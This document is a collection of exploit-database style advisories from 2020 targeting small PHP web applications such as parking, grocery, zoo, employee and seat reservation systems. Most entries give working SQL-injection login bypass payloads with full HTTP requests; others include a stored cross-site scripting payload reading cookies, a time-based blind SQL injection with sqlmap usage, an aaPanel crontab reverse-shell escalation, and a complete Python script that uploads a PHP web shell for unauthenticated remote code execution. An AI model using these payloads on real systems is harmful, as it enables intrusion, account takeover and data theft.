# Exploit Title: Vehicle Parking Management System 1.0 - Authentication Bypass # Google Dork: N/A # Date: 2020-10-14 # Exploit Author: BKpatron # Vendor Homepage: https://www.sourcecodester.com/php/14415/vehicle-parking-management-system-project-phpmysql-full-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/mayuri_k/lagos-parker-fullsource-code.zip # Version: v1.0 # Tested on: Win 10 # CVE: N/A # Vulnerability: Attacker can bypass login page and access to dashboard page # vulnerable file : /login.php # Parameter & Payload: username: '=''or'@email.com password: '=''or' # Proof of Concept: http://localhost/lagos-parker/login.php POST /lagos-parker/login.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 73 Referer: http://localhost/lagos-parker/login.php Cookie: PHPSESSID=q4efk7p0vo1866rwdxzq8aeam8 Connection: keep-alive Upgrade-Insecure-Requests: 1 email=%27%3D%27%27or%27%40email.com&password=%27%3D%27%27or%27&btn_login=: undefined

# Exploit Title: Simple Grocery Store Sales And Inventory System 1.0 - Authentication Bypass # Date: 24/09/2020 # Exploit Author: Saurav Shukla & Jyotsna Adhana # Vendor Homepage: https://www.sourcecodester.com/php/14461/simple-grocery-store-sales-and-inventory-system-using-phpmysql-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/sales-inventory-system-using-php.zip # Version: 1.0 # Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4 Step 1: Open the URL http://localhost/sales_inventory/login.php Step 2: use payload jyot' or 1=1# in user and password field Malicious Request::: POST /sales_inventory/ajax.php?action=login HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 53 Origin: http://localhost Connection: close Referer: http://localhost/sales_inventory/login.php Cookie: PHPSESSID=hdk9npcmq341ulcsn8cj6oefov username=jyot'+or+1%3d1%23&password=jyot'+or+1%3D1%23

#Exploit Title: Employee Management System 1.0 - Stored Cross Site Scripting #Date: 2020-10-16 #Exploit Author: Ankita Pal #Vendor Homepage: https://www.sourcecodester.com/php/14432/employee-management-system-using-php.html #Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/employee-management-system.zip #Version: 1.0 #Tested on: Windows 10 + xampp v3.2.4 Proof of Concept::: Step 1: Open the URL localhost:8081/Employee Management System/addemp.php Step 2: Use payload <img src=x onerror=alert(document.cookie)> in First Name and Last Name. Malicious Request::: POST /Employee%20Management%20System/////process/addempprocess.php HTTP/1.1 Host: localhost:8081 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------3267707159765331982713791736 Content-Length: 1571 Origin: http://localhost:8081 Connection: close Referer: http://localhost:8081/Employee%20Management%20System/////addemp.php Cookie: PHPSESSID=infdfigld4et4jndfgbn33kcsv Upgrade-Insecure-Requests: 1 -----------------------------3267707159765331982713791736 Content-Disposition: form-data; name="firstName" <img src=x onerror=alert(document.cookie)> -----------------------------3267707159765331982713791736 Content-Disposition: form-data; name="lastName" <img src=x onerror=alert(document.cookie)> -----------------------------3267707159765331982713791736 Content-Disposition: form-data; name="email" [email protected] -----------------------------3267707159765331982713791736 Content-Disposition: form-data; name="birthday" 2020-09-28 -----------------------------3267707159765331982713791736 Content-Disposition: form-data; name="gender" Female -----------------------------3267707159765331982713791736 Content-Disposition: form-data; name="contact" 9876543211 -----------------------------3267707159765331982713791736 Content-Disposition: form-data; name="nid" 12 -----------------------------3267707159765331982713791736 Content-Disposition: form-data; name="address" Gujarat -----------------------------3267707159765331982713791736 Content-Disposition: form-data; name="dept" CS -----------------------------3267707159765331982713791736 Content-Disposition: form-data; name="degree" BE -----------------------------3267707159765331982713791736 Content-Disposition: form-data; name="salary" -----------------------------3267707159765331982713791736 Content-Disposition: form-data; name="file"; filename="" Content-Type: application/octet-stream -----------------------------3267707159765331982713791736-- Cookie will be reflected on View Employee.

# Exploit Title: Zoo Management System 1.0 - Authentication Bypass # Date: 02/10/2020 # Exploit Author: Jyotsna Adhana # Vendor Homepage: https://phpgurukul.com/zoo-management-system-using-php-and-mysql/ # Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=12723 # Version: 1.0 # Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4 Step 1: Open the URL http://localhost/zoo/zms/admin/index.php Step 2: use payload jyot' or 1=1# in user and password field Malicious Request POST /zoo/zms/admin/index.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 66 Origin: http://localhost Connection: close Referer: http://localhost/zoo/zms/admin/index.php Cookie: PHPSESSID=s22oss00i0ob4hcnsgkobb9r7p Upgrade-Insecure-Requests: 1 username=jyot%27+or+1%3D1+%23&password=jyot%27+or+1%3D1+%23&login= Step 3: You will be logged in as admin.

#Exploit Title: Employee Management System 1.0 - Authentication Bypass #Date: 2020-10-16 #Exploit Author: Ankita Pal #Vendor Homepage: https://www.sourcecodester.com/php/14432/employee-management-system-using-php.html #Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/employee-management-system.zip #Version: 1.0 #Tested on: Windows 10 + xampp v3.2.4 Proof of Concept::: Step 1: Open the URL http://localhost:8081/Employee%20Management%20System/alogin.html Step 2: Use payload anki' or 1=1# for both username and password. Malicious Request::: POST /Employee%20Management%20System/process/aprocess.php HTTP/1.1 Host: localhost:8081 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 70 Origin: http://localhost:8081 Connection: close Referer: http://localhost:8081/Employee%20Management%20System/alogin.html Cookie: PHPSESSID=infdfigld4et4jndfgbn33kcsv Upgrade-Insecure-Requests: 1 mailuid=anki%27+or+1%3D1%23&pwd=anki%27+or+1%3D1%23&login-submit=Login You will be login as Admin of the application.

# Exploit Title: Company Visitor Management System (CVMS) 1.0 - Authentication Bypass # Date: 16/10/2020 # Exploit Author: Oğuz Türkgenç # Vendor Homepage: https://phpgurukul.com/company-visitor-management-system-using-php-and-mysql/ # Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=9602 # Version: 1.0 # Tested On: Windows 7 Enterprise SP1 + XAMPP V3.2.3 Step 1: Open the URL http://localhost/cvms/index.php Step 2: use payload ot' or 1=1# in user and password field Malicious Request POST /cvms/index.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.175.128/cvms/index.php Content-Type: application/x-www-form-urlencoded Content-Length: 36 Origin: http://localhost Connection: close Cookie: lang=english; PHPSESSID=qkg4nmdq97r4jkvkm4raa34660 Upgrade-Insecure-Requests: 1 username=ot%27+or+1%3D1+%23&password=ot%27+or+1%3D1+%23&login= Step 3: You will be logged in as admin.

#Exploit Title: Alumni Management System 1.0 - Authentication Bypass #Date: 2020-10-16 #Exploit Author: Ankita Pal #Vendor Homepage: https://www.sourcecodester.com/php/14524/alumni-management-system-using-phpmysql-source-code.html #Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/alumni-management-system.zip #Version: V1.0 #Tested on: Windows 10 + xampp v3.2.4 Proof of Concept::: Step 1: Open the URL http://localhost:8081/alumni-management-system/alumni/admin/login.php Step 2: use payload anki' or 1=1# for both username and password. Malicious Request::: POST /alumni-management-system/alumni/admin/ajax.php?action=login HTTP/1.1 Host: localhost:8081 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0 Accept: */* Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 53 Origin: http://localhost:8081 Connection: close Referer: http://localhost:8081/alumni-management-system/alumni/admin/login.php Cookie: PHPSESSID=infdfigld4et4jndfgbn33kcsv username=anki'+or+1%3D1%23&password=anki'+or+1%3D1%23 You will be login as admin of the application.

# Exploit Title: [aaPanel 6.6.6 - Authenticated Privilege Escalation] # Google Dork: [] # Date: [04.05.2020] # Exploit Author: [Ünsal Furkan Harani (Zemarkhos)] # Vendor Homepage: [https://www.aapanel.com/](https://www.aapanel.com/) # Software Link: [https://github.com/aaPanel/aaPanel](https://github.com/aaPanel/aaPanel) # Version: [6.6.6] (REQUIRED) # Tested on: [Linux ubuntu 4.4.0-131-generic #157-Ubuntu SMP Thu Jul 12 15:51:36 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux] # CVE : [CVE-2020-14421] if you are logged was admin; 1- go to the crontab 2- select shell script and paste your reverse shell code 3- click execute button and you are now root. because crontab.py running with root privileges. Remote Code Execution https://github.com/jenaye/aapanel

# Exploit Title: Restaurant Reservation System 1.0 - 'date' SQL Injection (Authenticated) # Date: 2020-10-05 # Exploit Author: b1nary # Vendor Homepage: https://www.sourcecodester.com/php/14482/restaurant-reservation-system-php-full-source-code-2020.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/restaurants_3.zip # Version: 1.0 # Tested on: Linux + Apache2 ------------------------------------------------------------------------------------ 1. Description: ---------------------- Restaurant Reservation System 1.0 allows SQL Injection via parameter 'date' in includes/reservation.inc.php. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 2. Proof of Concept: ---------------------- In Burpsuite intercept the request from the affected page with 'date' parameter and save it like re.req. Then run SQLmap to extract the data from the database: sqlmap -r re.req --dbms=mysql 3. Example payload: ---------------------- (time-based blind) fname=user&lname=user&date=2020-10-14' AND (SELECT 1934 FROM (SELECT(SLEEP(5)))lmWi) AND 'navS'='navS&time=16:00 - 20:00&num_guests=2&tele=123456789&comments=null&reserv-submit= 4. Burpsuite request: ---------------------- POST /restaurant/includes/reservation.inc.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 117 Origin: http://127.0.0.1 DNT: 1 Connection: close Referer: http://127.0.0.1/restaurant/reservation.php Cookie: PHPSESSID=r355njdkuddu4ac0a784i9i69m Upgrade-Insecure-Requests: 1 fname=user&lname=user&date=2020-10-14&time=16%3A00+-+20%3A00&num_guests=2&tele=123456789&comments=null&reserv-submit=

# Exploit Title: Seat Reservation System 1.0 - Unauthenticated Remote Code Execution # Exploit Author: Rahul Ramkumar # Date: 2020-09-16 # Vendor Homepage: www.sourcecodester.com # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/seat-reservation-system-using-php_0.zip # Version: 1.0 # Tested On: Windows 10 Enterprise 1809 (x64_86) + XAMPP 7.2.33-1 # Exploit Tested Using: Python 2.7.18 # CVE: CVE-2020-25763 # Vulnerability Description: # Seat Reservation System version 1.0 suffers from an Unauthenticated File Upload Vulnerability allowing Remote Attackers to gain Remote Code Execution (RCE) on the Hosting Webserver via uploading PHP files. import requests, sys, urllib, re from lxml import etree from io import StringIO from colorama import Fore, Back, Style requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning) import random import string def print_usage(STRING): return Style.BRIGHT+Fore.YELLOW+STRING+Fore.RESET if __name__ == "__main__": if len(sys.argv) != 2: print print_usage("Usage:\t\t python %s <WEBAPP_URL>" % sys.argv[0]) print print_usage("Example:\t python %s 'https://192.168.1.72:443/seat_reservation/'" % sys.argv[0]) sys.exit(-1) SERVER_URL = sys.argv[1] UPLOAD_DIR = 'admin/ajax.php?action=save_movie' UPLOAD_URL = SERVER_URL + UPLOAD_DIR random = ''.join([random.choice(string.ascii_letters + string.digits) for n in xrange(16)]) webshell = random+'.php' s = requests.Session() s.get(SERVER_URL, verify=False) image = { 'cover': ( webshell, '<?php echo shell_exec($_GET["d3crypt"]); ?>', 'application/php', {'Content-Disposition': 'form-data'} ) } fdata = {'id': '','title':'Shelling','description':'','duration_hour':'3','duration_min':'0','date_showing':'2020-01-01','end_date':'2040-09-25'} r1 = s.post(url=UPLOAD_URL, files=image, data=fdata, verify=False) r2 = s.get(SERVER_URL, verify=False) response_page = r2.content.decode("utf-8") parser = etree.HTMLParser() tree = etree.parse(StringIO(response_page), parser=parser) def get_links(tree): refs = tree.xpath("//img") links = [link.get('src', '') for link in refs] return [l for l in links] links = get_links(tree) print('Access your webshell at: ') for link in links: if webshell in link: print(SERVER_URL + link+'?d3crypt=whoami')